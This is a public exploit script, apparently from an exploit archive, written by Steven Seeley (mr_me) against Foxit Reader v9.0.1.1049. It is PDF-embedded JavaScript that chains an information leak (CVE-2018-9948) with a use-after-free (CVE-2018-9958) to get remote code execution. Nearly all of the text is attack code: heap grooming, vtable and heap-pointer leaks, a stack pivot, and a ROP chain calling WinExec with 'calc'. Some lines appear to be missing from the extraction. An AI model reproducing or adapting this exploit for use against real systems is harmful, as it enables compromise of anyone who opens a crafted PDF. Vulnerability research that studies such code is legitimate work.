Foxit Reader – Remote Code Execution

  • 作者: mr_me
    日期: 2018-06-25
  • 类别:
  • 来源:
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    Foxit Reader Remote Code Execution Exploit
    Written by: Steven Seeley (mr_me) of Source Incite
    Date: 22/06/2018
    Technical details:
    Target version: Foxit Reader v9.0.1.1049 (sha1: e3bf26617594014f4af2ef2b72b4a86060ec229f)
    Tested on:
    1. Windows 7 Ultimate x86 build 6.1.7601 sp1
    2. Windows 10 Pro x86 v1803 build 10.0.17134
    Vulnerabilities leveraged:
    1. CVE-2018-9948
    2. CVE-2018-9958
    var heap_ptr = 0;
    var foxit_base = 0;
    var pwn_array= [];
    function prepare_heap(size){
    This function prepares the heap state between allocations
    and frees to get a predictable memory address back. 
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
    arr[i] = this.addAnnot({type: "Text"});;
    if (typeof arr[i] == "object"){
    function gc() {
    This is a simple garbage collector, written by the notorious @saelo
    Greetz, mi amigo.
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
    var x = new ArrayBuffer(maxMallocBytes);
    function alloc_at_leak(){
    This is the function that allocates at the leaked address
    for (var i = 0; i < 0x64; i++){
    pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    function control_memory(){
    This is the function that fills the memory address that we leaked
    for (var i = 0; i < 0x64; i++){
    for (var j = 0; j < pwn_array[i].length; j++){
    pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
    function leak_vtable(){
    Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
    ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
    Found by: bit from meepwn team
    // alloc
    var a = this.addAnnot({type: "Text"});
    // free
    // kinda defeat lfh randomization in win 10
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    // leak the vtable
    var leaked = stolen[0] & 0xffff0000;
    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    foxit_base = leaked - 0x01f50000;
    function leak_heap_chunk(){
    Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
    ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
    Found by: bit from meepwn team
    // alloc
    var a = this.addAnnot({type: "Text"});
    // free
    // kinda defeat lfh randomization in win 10
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    // alloc at the freed location
    // leak a heap chunk of size 0x40
    heap_ptr = stolen[1];
    function reclaim(){
    This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
    All gadgets are from FoxitReader.exe v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
    arr[i] = new ArrayBuffer(0x60);
    var rop = new Int32Array(arr[i]);
    rop[0x00] = heap_ptr;// pointer to our stack pivot from the TypedArray leak
    rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
    rop[0x02] = 0x72727272;// junk
    rop[0x03] = foxit_base + 0x00001450// pop ebp; ret
    rop[0x04] = 0xffffffff;// ret of WinExec
    rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
    rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
    rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
    rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
    rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
    rop[0x0a] = foxit_base + 0x0041c6ca; // ret
    rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
    rop[0x0c] = 0x636c6163;// calc
    rop[0x0d] = 0x00000000;// adios, amigo
    for (var j = 0x0e; j < rop.length; j++) {
    rop[j] = 0x71727374;
    function trigger_uaf(){
    Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
    ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
    Found by: Steven Seeley (mr_me) of Source Incite
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    get: function () {
    // free
    that.getAnnot(0, "uaf").destroy();
    // reclaim freed memory
    return 1; 
    // re-use
    a.point = arr;
    function main(){
    // 1. Leak a heap chunk of size 0x40
    // 2. Leak vtable and calculate the base of Foxit Reader
    // 3. Then fill the memory region from step 1 with a stack pivot
    // 4. Trigger the uaf, reclaim the memory, pivot to rop and win
    if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
    if (app.appFoxitVersion == ""){
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